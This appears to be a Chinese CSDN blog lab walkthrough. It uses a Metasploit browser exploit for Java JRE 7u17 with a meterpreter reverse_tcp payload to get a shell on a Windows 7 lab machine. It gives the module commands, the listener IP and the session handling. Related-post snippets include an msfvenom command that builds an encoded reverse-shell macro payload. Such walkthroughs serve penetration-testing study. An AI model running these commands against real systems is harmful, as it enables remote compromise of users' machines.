msf利用jre-7u17-windows-i586漏洞获取shell

最新推荐文章于 2024-07-30 23:30:39 发布
最新推荐文章于 2024-07-30 23:30:39 发布
阅读量1k 收藏 1
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/104473891
版权

首先要在win7安装java环境,版本是jre-7u17-windows-i586

百度云链接:https://pan.baidu.com/s/1UOuBZcCKbBcrJM7qzIw_nQ
提取码:ociq
在这里插入图片描述
安装期间先去msf开启模块

use exploit/multi/browser/java_jre17_driver_manager 
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.132.144
jobs -K
exploit

jobs -K是确保后台没有正在执行的会话,如果kali之前没进行任何监听操作的话可以省略这一步。

在这里插入图片描述
等到win7环境安装完成,我们复制url(上图内容的倒数第二行)
http://192.168.132.144:8080/xPIWLfQDV7M
在win7的ie上访问,点击稍后
在这里插入图片描述

发现已经建立连接
在这里插入图片描述

 sessions
 sessions -i 1

sessions是查看当前所有已经建立的会话
sessions -i 数字 是指定并进入会话,后面的数字是看情况指定的
在这里插入图片描述这样便成功拿到用户权限了。

当然,访问连接之后会在win7界面上生成一个java小窗口,msf应该就是用这个小窗口维持权限,这就类似于xss注入一个宽高为0的窗口进行维持一样,只不过这个java窗口在关闭之后也是可以继续维持的。
在这里插入图片描述

如果关闭java.exe就会断开跟msf的连接

Deeeelete
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
基于 java 环境的漏洞利用获取 Windows系统shell
Cwillchris的博客
05-27 441
基于 java 环境的漏洞利用获取 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) jre-7u17-windows-i586.exe 实验步骤: 1、搭建java环境 xshell上传jre-7u17-windows-i586.exe到win7 安装都一直点下一步就可以 2、 使用 java 模块 getshell msfbd run //进入msf use exploit/multi/brow
jre-7u17-windows-i586
03-05
jre-7u17-windows-i586,请下载使用
jre-7u17-windows-i586.exe
weixin_41809586的博客
03-08 3591
谁能帮忙看下这个程序
Java开发环境的搭建(Java 17
最新发布
code2cat的博客
07-30 1855
通过以上步骤,你已经成功搭建了Java开发环境。现在你可以开始编写和运行Java程序了。在接下来的文章中,我们将介绍Java的基础语法,帮助你更深入地掌握Java编程。欢迎继续关注!
jdk-7u17-windows-i586
04-02
jdk-7u17-windows-i586 看准版本和型号喔
jre-7u17-windows-x64.exe
06-11
JDK是一个开发环境,用于构建应用程序,applet程序,和使用Java编程语言的组成部分。 Java Development Kit(JDK)是Sun Microsystems针对Java开发员的产品。自从Java推出以来,JDK已经成为使用最广泛的Java SDK。JDK 是整个Java的核心,包括了Java运行环境,Java工具和Java基础的类库。JDK是学好Java的第一步。而专门运行在x86平台的Jrocket在服务端运行效率也要比Sun JDK好很多。从SUN的JDK5.0开始,提供了泛型等非常实用的功能,其版本也不断更新,运行效率得到了非常大的提高。 定于2月19日发布的Java SE原来的重要补丁更新 - 2013年2月,但甲骨文决定加快释放该重要补丁更新,因为积极开发“野生”的Java漏洞影响在桌面浏览器,运行时环境(JRE)与该重要补丁更新解决。 更新日志:JDK 7u17 发布,该版本修复了浏览器插件的严重的安全漏洞:CVE-2013-1493,Oracle 强烈建议使用 Java 浏览器插件用户升级。 重要补丁更新是针对多个安全漏洞的补丁集合。为Java SE重要补丁更新还包括非安全修复程序。重要补丁更新是累积性的,每个公告只描述自上一个重要补丁更新和安全警报添加的安全修复。因此,以前的重要补丁更新和安全警报建议应检讨有关以前累积的安全修复程序。 请参考: 重要补丁更新和安全警报的信息,有关Oracle安全性公告。 由于一个成功的攻击所带来的威胁,Oracle强烈建议用户尽快应用CPU修复程序。该重要补丁更新包含50个新安全修复程序的Java SE的产品。 支持受影响的产品 该重要补丁更新解决的安全漏洞影响以下按类别列出的产品。请点击可用补丁列或可用补丁表中的链接来访问这些补丁的文档。
微软通杀漏洞-CVE-2021-1675复现
Ms08067安全实验室
08-19 2460
文章来源|MS08067安全实验室本文作者:龙诺(Web知识星球追洞小组)一 准备环境实验环境:windows2019 (192.168.189.145) kali linux (192...
网络安全kali之利用宏感染word文档获取shell
xueshenlaila的博客
03-25 8211
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ k
CNVD-2020-10487复现(Apache Tomcat文件包含漏洞)
afei001
08-29 1390
目录 1.漏洞概述 2.影响范围 3.风险等级 4.漏洞复现 4.1.tomcat环境搭建 4.2.POC利用测试 5.POC分析 6.配合文件上传漏洞shell 7.修复建议 8.漏洞链接 1.漏洞概述 2020年2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷造成的。攻击者可构造恶意的请求包进行文件包含操作,...
jre-7u7-windows-i586
09-27
jre-7u7-windows-i586
jre-7u71-windows-i586
01-20
jre-7u71-windows-i586,它包括Java虚拟机、Java核心类库和支持文件。它不包含开发工具--编译器、调试器和其它工具。JRE需要辅助软件--JavaPlug-in--以便在浏览器中运行applet。
jre-7u67-windows-i586
12-27
JREJava Runtime Environment,Java运行环境),运行JAVA程序所必须的环境的集合,包含JVM标准实现及Java核心类库。 jre-7u67-windows-i586是32位JRE安装包,大小只有20多M,比JDK7小了100多M,使用比较便捷。
jdk-7u17-windows-x64
03-31
jdk-7u17-windows-x64 看准版本和型号喔
反弹shell原理与实现
悦分享
08-02 3353
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
msf利用0DAY漏洞获取shell
Deeeelete的博客
02-23 719
安装CVE-2018-8174_EXP git clone https://github.com/iBearcat/CVE-2018-8174_EXP .git 然后发现没克隆下来,所以这里我直接用xshell上传了zip包并解压在本目录 进入我们的文件目录 cd CVE-2018-8174_EXP-master/ 生成恶意html文件 python CVE-2018-8174.py -...
jdk-7u17-windows-x64 安装版
11-28
安装版 jdk-7u17-windows-x64 jdk 1.7.0_17 windows 64 位
利用MS17-010永恒之蓝漏洞攻破Win7靶机教程
MS17-010永恒之蓝漏洞利用涉及到了攻击者如何利用Windows系统中的漏洞进行远程攻击,从网络探测、目标识别、利用漏洞获取shell权限到后续的渗透操作,每一个步骤都需要精确且熟练的操作。这个案例提醒我们,保持系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值